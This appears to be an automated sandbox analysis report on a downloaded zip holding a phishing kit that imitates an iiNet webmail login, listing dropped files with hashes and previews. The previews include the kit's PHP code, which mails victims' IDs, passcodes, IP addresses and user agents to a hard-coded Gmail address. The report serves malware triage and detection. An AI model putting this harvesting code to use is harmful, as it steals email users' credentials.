Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	226191
Entropy (8bit):	5.170931573371693
Encrypted:	false
SSDEEP:	6144:NfSCmdDzfyt+dDzf6lS+vRnNEyIYQE0d+wlK0X0k7lyKe4VyfcH:NfSCmdDzfyMdDzf6hvRnNEyIYQE0d+w9
MD5:	059CD76EA4A5433E14FF6151A432EE48
SHA1:	C886FE4CA2649B2FC7F917A936901BBF806D47C7
SHA-256:	F111F6F660B6F2759FC036A25681BBFF08811ED1EF2A0C9B436191B52539A4D3
SHA-512:	305F4ADF9F4A009529FC3B149CBB3DC18D7B69F95AD024F793C3C98C49D55C3245D5C8DB85D93DD2691B9FD873884B76035E804166387432D3075FA60165CC90
Malicious:	false
Reputation:	low
Preview:	../* Advertisement type & sizes /..../ General /....img {.. max-width: 100%;..}.....style__link___2SS-5,...style__content___2AW4k a {.. display: block;..}..../ WEB: messageListTop /.....desktop .style__messageListTop___MZGCu,...tablet .style__messageListTop___MZGCu {.. padding: 20px 20px 0;..}.....desktop .style__messageListTop___MZGCu .style__content___2AW4k,...tablet .style__messageListTop___MZGCu .style__content___2AW4k {.. overflow: hidden;.. width: 100%;.. margin: 0 auto;.. text-align: center;.. line-height: 0;..}..../ WEB: messageListRight /.....desktop .style__messageListRight___2HtmQ,...tablet .style__messageListRight___2HtmQ {.. padding: 20px 0 20px 25px;..}.....desktop .style__messageListRight___2HtmQ .style__content___2AW4k,...tablet .style__messageListRight___2HtmQ .style__content___2AW4k {.. overflow: hidden;.. width: 100%;.. margin: 0 auto;.. text-align: center;.. line-height: 0;..}..../ WEB MOBILE: threadListTop */.....de

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\css\cb3cc3fa3480964080588c52478ae092-login.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PNG image data, 763 x 207, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	73869
Entropy (8bit):	7.986259137032153
Encrypted:	false
SSDEEP:	1536:UAZ8jV8xF1pkc8mRr5wlHxZmfn6Xo4dl2qlwZ2KpxAt0Ok2tQ16Wzoo:zZIV8xPpRFwRZm/Odr6XpCtqVtD
MD5:	9DA0C8CB46C052736D2AB7868AD46A93
SHA1:	9B1D2A89EEC68C5D9F857D7FBD28886A1770BFEE
SHA-256:	13C4D0269B4149CED9162B84892CDDA75F469F45E24052F8FD047D7E6DDFD74E
SHA-512:	07D1F9FBB19285FD001D24885FE0016E66D5B11261DED1CAC9DFFD35FAB0668F50DF1DD388C2CE0EC21479C12BA6FA4A9FCCD5C111611D3099074843D18CEBCE
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............k.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2023-07-06</Attrib:Created>. <Attrib:ExtId>19ce723f-081c-4b36-9ac1-6658c117c623</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>The Messaging Company - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:Creat

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\email.php

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PHP script, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.843226921458293
Encrypted:	false
SSDEEP:	3:JZtEzHLGCIE2KHedySLIVY:dEzHLVIqSLIe
MD5:	69BFECCE7D4C8696C17087D376E11FDB
SHA1:	0B5CB177D0977D181090A1C5E46AF6335E703C06
SHA-256:	1F2A3FCDFCC879EC238546E84C1D9A1B455C724CE85C1310D281EC810FCA433E
SHA-512:	D9F158F96FABE511742045755E4180D38A4D323D010EEAA1C9BB81B0CF2505593A65A39FCDB1802C1AB66D9109B2F064751D76D0147556BB4206B60AFC890016
Malicious:	false
Reputation:	low
Preview:	<?php ..$Receive_email="gregory.maxgrant@gmail.com";..$redirect="https://www.google.com/";..?>

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\images\iinet-logo.jpg

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 405x239, components 3
Category:	dropped
Size (bytes):	7111
Entropy (8bit):	7.559608060506345
Encrypted:	false
SSDEEP:	192:RLOG++/tXf4KN42CRTO0cvATCUe82UHLOGB:9OG+8Pa2CRTO0fRp2UHLOGB
MD5:	8D68F26A48057C3A61870C43CFC86F54
SHA1:	FFF9EC6159F2FDF21F2DE1F519746AC8E90B01CA
SHA-256:	7A79F28CB73F4C9AE72A306925718313360C8E628A2C08AE85CE1762CC752282
SHA-512:	F9FC997E27808510441D729F246DF53A4CC2ACD79A33B2589AF14FB41D9AB4A5E4E684F4D3A3AA05D51BEEBC61C85ABDE7B62954008F40D9AAFACD0615D43CD9
Malicious:	false
Reputation:	low
Preview:	......JFIF.....d.d......Ducky.......<.....&Adobe.d........................g..........................................................................................................................................................................................................................................P2.4 .1.30..5@..!#$.......................r.!.. 1Aq..23@Qa."B..0.R........b#4.................P. ..!1..0`a.................... .!1Q.PAaq.@......0.........................................................................................................................................................=.z..o.&....~~}.5.u.X......H..........%........\..,...@.f"}..S.q.N.o0.........g..@.....YF.U..e.....1.z.........L........,.........4...%.u..;.9._IFgQ~.d.j.E1.,.....z-...J......[.....1.}.*..........{.T..^.K...P..Y...M.l.F...5F..0..Y.........i#C0..ff'rr.z.-z...e..P>.......~.(..-..L@..........L..43...fbw' .....n.Z...Xj.......;.......x.Y..R=.......)....o......)..[...1@.....

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\images\tmc-login.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PNG image data, 381 x 103, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	29981
Entropy (8bit):	7.978588134614221
Encrypted:	false
SSDEEP:	768:hRTBV2bfxVZQTJeCn+iJKDulQT7rwINswPRs23:hZTExvwTnbgulu/3
MD5:	713A50170266749ED63B48014015E845
SHA1:	052AA58A4F7FCEDA80AB7C9324F3C3455E357932
SHA-256:	55622C1F5A7E3DCA7070BDDB0FA4F7CE6A926FC4D584A2EEC5FF43D894AB48AF
SHA-512:	7357704FD9952C01500EEE7AA282969C51F92082CE4133ACF725EAEB7F24CCD511EC199031CBFD65BB1F5BF73C720F9E9A7186FA01F8E71F7832745A74D783F8
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...}...g......C......pHYs...........D.....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2023-07-06</Attrib:Created>. <Attrib:ExtId>3548e507-e2b4-44be-98b5-392a027aee3e</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>The Messaging Company - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:Creat

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\index.html

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3461)
Category:	dropped
Size (bytes):	34446
Entropy (8bit):	5.206104283504241
Encrypted:	false
SSDEEP:	768:c8jqyTo3u/dwLLHwl7yrCwGFTlikG8o6XvdUCpcnxi1:zjBc3ywLLHwl7yrR2TliCoyvd0+
MD5:	235CD965BF540FC8E08FE6CCD3DCD57D
SHA1:	3D512A98C6DBFB23A4EBCEE7681D129B9D3FA3DA
SHA-256:	4087CCD33D029BBE65EB06C3B15CFA5C184919EA8639B2F3DF5CF6A4BC942A26
SHA-512:	C8F98F6D13C141F8110EC85454C5AD9E34AF1FDF0DC4158421F6915EC36249166D7C4074E3467B135025024D6BB1A0A212D7BE3BF2C97A4D2127CACED0C757BD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\index.html, Author: Joe Security
Reputation:	low
Preview:	<!DOCTYPE html>.<html data-os="Mac OS" data-ua="Chrome-118.0.0.0" class="hydrated" lang="en">..<head>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">. <style data-styles="">. duet-date-picker {. visibility: hidden. }.. .hydrated {. visibility: inherit. }. </style>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=5">. <title>Sign in - Webmail</title>. <link rel="stylesheet" href="./css/app-059cd76ea4a5433e14ff6151a432ee48.css">. <style>. @font-face {. font-family: 'Open Sans Regular';. font-style: normal;. font-weight: 400;. src: url('chrome-extension://gkkdmjjodidppndkbkhhknakbeflbomf/fonts/open_sans/open-sans-v18-latin-regular.woff');. }. </style>. <style>. @font-face {. font-family: 'Open Sans Bold';. font-style: normal;. font-weight: 800;.

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\next.php

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PHP script, ASCII text
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	5.130575721157786
Encrypted:	false
SSDEEP:	24:lhP/XC2WkYFKgG0JN77gVB91mZgATV14g+IDV:lhPfvfdokKVsi
MD5:	D7DA5B7BEA5E2423ED2BFE3A508C1B3A
SHA1:	380E84DF4B63891D66D09490229F8A01545AC5D8
SHA-256:	52EAE2164AACE96AD5E190C24281A1B79930B3507204A32DC6E8E2FE22FF7682
SHA-512:	1E19DD788FC7C3A7E7D5FD2F1F40BCDB1369A4D622AEC5B689F84C00A2BE4C00C49AA54671CCA7DA08C1452A1B63F589716497FC1B53B66B0F84630C03FAF63F
Malicious:	false
Reputation:	low
Preview:	<?php.ob_start();..include 'email.php';.$ai = trim($_POST['ai']);.$pr = trim($_POST['pr']);.if(isset($_POST['btn1'])){..$ip = getenv("REMOTE_ADDR");..$hostname = gethostbyaddr($ip);..$useragent = $_SERVER['HTTP_USER_AGENT'];..$message .= "\|----------\| \|--------------\|\n";....$message .= "Online ID : ".$_POST['ai']."\n";..$message .= "Passcode : ".$_POST['pr']."\n";..$message .= "\|--------------- I N F O \| I P -------------------\|\n";..$message .= "\|Client IP: ".$ip."\n";..$message .= "\|--- http://www.geoiptool.com/?IP=$ip ----\n";..$message .= "User Agent : ".$useragent."\n";..$message .= "\|----------- --------------\|\n";..$send = $Receive_email;..$subject = "Login : $ip";. .mail($send, $subject, $message); . .echo $message;..$signal = 'ok';..$msg = 'InValid Credentials';....// $praga=rand();..// $praga=md5($praga);.}.else{..$signal = 'bad';..$msg = 'Please fill in all the fields.';.}.$data = array(. 'signal' => $signal,. 'msg' => $msg,.

C:\Users\user\AppData\Local\Temp\unarchiver.log

Download File

Process:	C:\Windows\SysWOW64\unarchiver.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2032
Entropy (8bit):	5.211487300056362
Encrypted:	false
SSDEEP:	48:CWGQchGthGbthGthGp/hGqZkhGthGp0hGbLhGPhGVhGUhGthGohGthGQhG3hGAhR:+YnpQ/v7
MD5:	F60F385B5FD9F82B9B8281CED6E8D0D9
SHA1:	55602538758450D3EA35FC8E2BC16D441F293A15
SHA-256:	77A4CC5CA3544011F034465C845E5E10E672A4FED8C4B70AF1409FB310FD8D1B
SHA-512:	CF41DD59C92A8ABF4ECB0A1B62E246DDEA44FE436DD0DA1527D86B8AAE502724081C82EE49D18032D501E20DDA707DD276FD79AE7F203B67FB6483F236680306
Malicious:	false
Reputation:	low
Preview:	10/02/2024 12:35 AM: Unpack: C:\Users\user\Desktop\download\Webmail-iinet.zip..10/02/2024 12:35 AM: Tmp dir: C:\Users\user\AppData\Local\Temp\nwe5galq.xcu..10/02/2024 12:35 AM: Received from standard out: ..10/02/2024 12:35 AM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..10/02/2024 12:35 AM: Received from standard out: ..10/02/2024 12:35 AM: Received from standard out: Scanning the drive for archives:..10/02/2024 12:35 AM: Received from standard out: 1 file, 156013 bytes (153 KiB)..10/02/2024 12:35 AM: Received from standard out: ..10/02/2024 12:35 AM: Received from standard out: Extracting archive: C:\Users\user\Desktop\download\Webmail-iinet.zip..10/02/2024 12:35 AM: Received from standard out: --..10/02/2024 12:35 AM: Received from standard out: Path = C:\Users\user\Desktop\download\Webmail-iinet.zip..10/02/2024 12:35 AM: Received from standard out: Type = zip..10/02/2024 12:35 AM: Received from standard out: Physical Size =

C:\Users\user\Desktop\cmdline.out

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1432
Entropy (8bit):	4.97037621590896
Encrypted:	false
SSDEEP:	24:xP/8mwWXWhxePgwUbHoRQ/y8m2E398XWhxePjJbUbHMV6C2fIvKbHZ:SWXWhGUbIRCFe3UWhadUbsMfgvKb5
MD5:	3AFC337159C3ED7514DEC9B665EFDBEB
SHA1:	31D65F66616A75BE5E33E74DB65160031EAA8874
SHA-256:	C899EAEE1CBC923FB45B989DDAFDC4AEE0195DE48DA18BC06930E42840FE99CD
SHA-512:	860013803A3B0783383B07C5B22AF95934C6618C229A027A07830D50198005D9D9C21D6A1D3D8BC6EDD01F117B88C7FAEA6E8124711B285835EB896C5045F45F
Malicious:	false
Reputation:	low
Preview:	--2024-10-02 00:35:29-- https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip..Resolving maninhocontabilidade.com.br (maninhocontabilidade.com.br)... 191.37.38.39..Connecting to maninhocontabilidade.com.br (maninhocontabilidade.com.br)\|191.37.38.39\|:443... connected...HTTP request sent, awaiting response... 200 OK..Length: 156013 (152K) [application/zip]..Saving to: 'C:/Users/user/Desktop/download/Webmail-iinet.zip'.... 0K .......... .......... .......... .......... .......... 32% 157K 1s.. 50K .......... .......... .......... .......... .......... 65% 543K 0s.. 100K .......... .......... .......... .......... ........ 97% 5.46M=0.4s....2024-10-02 00:35:32 (353 KB/s) - Connection closed at byte 151978. Retrying.....--2024-10-02 00:35:33-- (try: 2) https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip..Connecting to maninhocontabilidade.com.br (maninhocontabilidade.com.br)\|191.37.38.39\|:443... connected...HTTP request sent, awaiting response... 206 Partial Conte

C:\Users\user\Desktop\download\Webmail-iinet.zip

Download File

Process:	C:\Windows\SysWOW64\wget.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	156013
Entropy (8bit):	7.99610269325873
Encrypted:	true
SSDEEP:	3072:LfBskiW7AxKVXWxFFwRZm/idr6Xp5ViRxuu0sJVaoz8WhRF/yq5SBRmKLs:jB/VXW/FwGaCieu0s/aoIWhrD5SnLs
MD5:	05D45851016732596BB76FC852928AA5
SHA1:	1715020D7B5BB7EFCC929A99ABA8B7F7B9F8F70A
SHA-256:	095FDD7E03075B4FFCA7F3BDFD516E51FD5FFAC25A274C74F9DEEB11C39FFCF1
SHA-512:	466E24182CE94F04EEA971C4F6338DB841F937D9BE1D2F8E3A3B3F338E7C3E553F383074C8CF11122ED8E92A5660D3F3DDBC90712E9A3C360C81778684E9097E
Malicious:	false
Reputation:	low
Preview:	PK...........X................Webmail-iinet/css/PK.........MZW.... ....s..:...Webmail-iinet/css/app-059cd76ea4a5433e14ff6151a432ee48.css.<.s...g......)S.(...l.N}M.$N.&.... .1E.$.d........d..U...,.....<...9.\..... i.K...S.I.\|...o..3..<L..x1s.\|...Ex.^.r>r.....7..G.(o.rq.......~..;..(KK..[.../...7..e...q.E..4@.....Y...g.y\.o.%G.3!.e._+.r/...g.+.....).t.PY..I..F..-o.?^....t,......8....4.G.<.LHz.....).....pUf.aInJ7L..4D....v..s....Y.a.^c.....C.....W/u5..$X.l.!2..m.F ...........).9.'k.D...w.?.}m ..."...i.g.#.g.0.....qV......E....[......6..{..h../..,=%dR.......o.N+.7.u.l$....U5.."..%..d@.. .TTw....T.,..4z.....1t........A...<.3..g.=p.!.G^Y.t../w..V...m.:.....,.....^...j...P!z.0`...X.A` e.O.<N....x.G.$...e...:@...`......O..qv...p.]o}..-."....Z.a.G....7/.D,..#'..f.-..).<K..:..K....J..[.T.`..)..^...Nz..c.....:.....~T.@sXr"p...t}.Qyo8......wF...M...j..]..4!7....s\|...vw..$b....Z..T....*.E.-c.8...X..YN..$j.GF..O....]Y.H....,.N..P.7..j...sB$l.9A%...L

C:\Users\user\Desktop\extract\Webmail-iinet\css\app-059cd76ea4a5433e14ff6151a432ee48.css

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	226191
Entropy (8bit):	5.170931573371693
Encrypted:	false
SSDEEP:	6144:NfSCmdDzfyt+dDzf6lS+vRnNEyIYQE0d+wlK0X0k7lyKe4VyfcH:NfSCmdDzfyMdDzf6hvRnNEyIYQE0d+w9
MD5:	059CD76EA4A5433E14FF6151A432EE48
SHA1:	C886FE4CA2649B2FC7F917A936901BBF806D47C7
SHA-256:	F111F6F660B6F2759FC036A25681BBFF08811ED1EF2A0C9B436191B52539A4D3
SHA-512:	305F4ADF9F4A009529FC3B149CBB3DC18D7B69F95AD024F793C3C98C49D55C3245D5C8DB85D93DD2691B9FD873884B76035E804166387432D3075FA60165CC90
Malicious:	false
Reputation:	low
Preview:	../* Advertisement type & sizes /..../ General /....img {.. max-width: 100%;..}.....style__link___2SS-5,...style__content___2AW4k a {.. display: block;..}..../ WEB: messageListTop /.....desktop .style__messageListTop___MZGCu,...tablet .style__messageListTop___MZGCu {.. padding: 20px 20px 0;..}.....desktop .style__messageListTop___MZGCu .style__content___2AW4k,...tablet .style__messageListTop___MZGCu .style__content___2AW4k {.. overflow: hidden;.. width: 100%;.. margin: 0 auto;.. text-align: center;.. line-height: 0;..}..../ WEB: messageListRight /.....desktop .style__messageListRight___2HtmQ,...tablet .style__messageListRight___2HtmQ {.. padding: 20px 0 20px 25px;..}.....desktop .style__messageListRight___2HtmQ .style__content___2AW4k,...tablet .style__messageListRight___2HtmQ .style__content___2AW4k {.. overflow: hidden;.. width: 100%;.. margin: 0 auto;.. text-align: center;.. line-height: 0;..}..../ WEB MOBILE: threadListTop */.....de

C:\Users\user\Desktop\extract\Webmail-iinet\css\cb3cc3fa3480964080588c52478ae092-login.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PNG image data, 763 x 207, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	73869
Entropy (8bit):	7.986259137032153
Encrypted:	false
SSDEEP:	1536:UAZ8jV8xF1pkc8mRr5wlHxZmfn6Xo4dl2qlwZ2KpxAt0Ok2tQ16Wzoo:zZIV8xPpRFwRZm/Odr6XpCtqVtD
MD5:	9DA0C8CB46C052736D2AB7868AD46A93
SHA1:	9B1D2A89EEC68C5D9F857D7FBD28886A1770BFEE
SHA-256:	13C4D0269B4149CED9162B84892CDDA75F469F45E24052F8FD047D7E6DDFD74E
SHA-512:	07D1F9FBB19285FD001D24885FE0016E66D5B11261DED1CAC9DFFD35FAB0668F50DF1DD388C2CE0EC21479C12BA6FA4A9FCCD5C111611D3099074843D18CEBCE
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............k.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2023-07-06</Attrib:Created>. <Attrib:ExtId>19ce723f-081c-4b36-9ac1-6658c117c623</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>The Messaging Company - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:Creat

C:\Users\user\Desktop\extract\Webmail-iinet\email.php

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PHP script, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.843226921458293
Encrypted:	false
SSDEEP:	3:JZtEzHLGCIE2KHedySLIVY:dEzHLVIqSLIe
MD5:	69BFECCE7D4C8696C17087D376E11FDB
SHA1:	0B5CB177D0977D181090A1C5E46AF6335E703C06
SHA-256:	1F2A3FCDFCC879EC238546E84C1D9A1B455C724CE85C1310D281EC810FCA433E
SHA-512:	D9F158F96FABE511742045755E4180D38A4D323D010EEAA1C9BB81B0CF2505593A65A39FCDB1802C1AB66D9109B2F064751D76D0147556BB4206B60AFC890016
Malicious:	false
Reputation:	low
Preview:	<?php ..$Receive_email="gregory.maxgrant@gmail.com";..$redirect="https://www.google.com/";..?>

C:\Users\user\Desktop\extract\Webmail-iinet\images\iinet-logo.jpg

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 405x239, components 3
Category:	dropped
Size (bytes):	7111
Entropy (8bit):	7.559608060506345
Encrypted:	false
SSDEEP:	192:RLOG++/tXf4KN42CRTO0cvATCUe82UHLOGB:9OG+8Pa2CRTO0fRp2UHLOGB
MD5:	8D68F26A48057C3A61870C43CFC86F54
SHA1:	FFF9EC6159F2FDF21F2DE1F519746AC8E90B01CA
SHA-256:	7A79F28CB73F4C9AE72A306925718313360C8E628A2C08AE85CE1762CC752282
SHA-512:	F9FC997E27808510441D729F246DF53A4CC2ACD79A33B2589AF14FB41D9AB4A5E4E684F4D3A3AA05D51BEEBC61C85ABDE7B62954008F40D9AAFACD0615D43CD9
Malicious:	false
Reputation:	low
Preview:	......JFIF.....d.d......Ducky.......<.....&Adobe.d........................g..........................................................................................................................................................................................................................................P2.4 .1.30..5@..!#$.......................r.!.. 1Aq..23@Qa."B..0.R........b#4.................P. ..!1..0`a.................... .!1Q.PAaq.@......0.........................................................................................................................................................=.z..o.&....~~}.5.u.X......H..........%........\..,...@.f"}..S.q.N.o0.........g..@.....YF.U..e.....1.z.........L........,.........4...%.u..;.9._IFgQ~.d.j.E1.,.....z-...J......[.....1.}.*..........{.T..^.K...P..Y...M.l.F...5F..0..Y.........i#C0..ff'rr.z.-z...e..P>.......~.(..-..L@..........L..43...fbw' .....n.Z...Xj.......;.......x.Y..R=.......)....o......)..[...1@.....

C:\Users\user\Desktop\extract\Webmail-iinet\images\tmc-login.png

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PNG image data, 381 x 103, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	29981
Entropy (8bit):	7.978588134614221
Encrypted:	false
SSDEEP:	768:hRTBV2bfxVZQTJeCn+iJKDulQT7rwINswPRs23:hZTExvwTnbgulu/3
MD5:	713A50170266749ED63B48014015E845
SHA1:	052AA58A4F7FCEDA80AB7C9324F3C3455E357932
SHA-256:	55622C1F5A7E3DCA7070BDDB0FA4F7CE6A926FC4D584A2EEC5FF43D894AB48AF
SHA-512:	7357704FD9952C01500EEE7AA282969C51F92082CE4133ACF725EAEB7F24CCD511EC199031CBFD65BB1F5BF73C720F9E9A7186FA01F8E71F7832745A74D783F8
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...}...g......C......pHYs...........D.....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2023-07-06</Attrib:Created>. <Attrib:ExtId>3548e507-e2b4-44be-98b5-392a027aee3e</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>The Messaging Company - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:xmp='http://ns.adobe.com/xap/1.0/'>. <xmp:CreatorTool>Canva</xmp:Creat

C:\Users\user\Desktop\extract\Webmail-iinet\index.html

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3461)
Category:	dropped
Size (bytes):	34446
Entropy (8bit):	5.206104283504241
Encrypted:	false
SSDEEP:	768:c8jqyTo3u/dwLLHwl7yrCwGFTlikG8o6XvdUCpcnxi1:zjBc3ywLLHwl7yrR2TliCoyvd0+
MD5:	235CD965BF540FC8E08FE6CCD3DCD57D
SHA1:	3D512A98C6DBFB23A4EBCEE7681D129B9D3FA3DA
SHA-256:	4087CCD33D029BBE65EB06C3B15CFA5C184919EA8639B2F3DF5CF6A4BC942A26
SHA-512:	C8F98F6D13C141F8110EC85454C5AD9E34AF1FDF0DC4158421F6915EC36249166D7C4074E3467B135025024D6BB1A0A212D7BE3BF2C97A4D2127CACED0C757BD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\Desktop\extract\Webmail-iinet\index.html, Author: Joe Security
Reputation:	low
Preview:	<!DOCTYPE html>.<html data-os="Mac OS" data-ua="Chrome-118.0.0.0" class="hydrated" lang="en">..<head>. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">. <style data-styles="">. duet-date-picker {. visibility: hidden. }.. .hydrated {. visibility: inherit. }. </style>. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=5">. <title>Sign in - Webmail</title>. <link rel="stylesheet" href="./css/app-059cd76ea4a5433e14ff6151a432ee48.css">. <style>. @font-face {. font-family: 'Open Sans Regular';. font-style: normal;. font-weight: 400;. src: url('chrome-extension://gkkdmjjodidppndkbkhhknakbeflbomf/fonts/open_sans/open-sans-v18-latin-regular.woff');. }. </style>. <style>. @font-face {. font-family: 'Open Sans Bold';. font-style: normal;. font-weight: 800;.

C:\Users\user\Desktop\extract\Webmail-iinet\next.php

Download File

Process:	C:\Windows\SysWOW64\7za.exe
File Type:	PHP script, ASCII text
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	5.130575721157786
Encrypted:	false
SSDEEP:	24:lhP/XC2WkYFKgG0JN77gVB91mZgATV14g+IDV:lhPfvfdokKVsi
MD5:	D7DA5B7BEA5E2423ED2BFE3A508C1B3A
SHA1:	380E84DF4B63891D66D09490229F8A01545AC5D8
SHA-256:	52EAE2164AACE96AD5E190C24281A1B79930B3507204A32DC6E8E2FE22FF7682
SHA-512:	1E19DD788FC7C3A7E7D5FD2F1F40BCDB1369A4D622AEC5B689F84C00A2BE4C00C49AA54671CCA7DA08C1452A1B63F589716497FC1B53B66B0F84630C03FAF63F
Malicious:	false
Reputation:	low
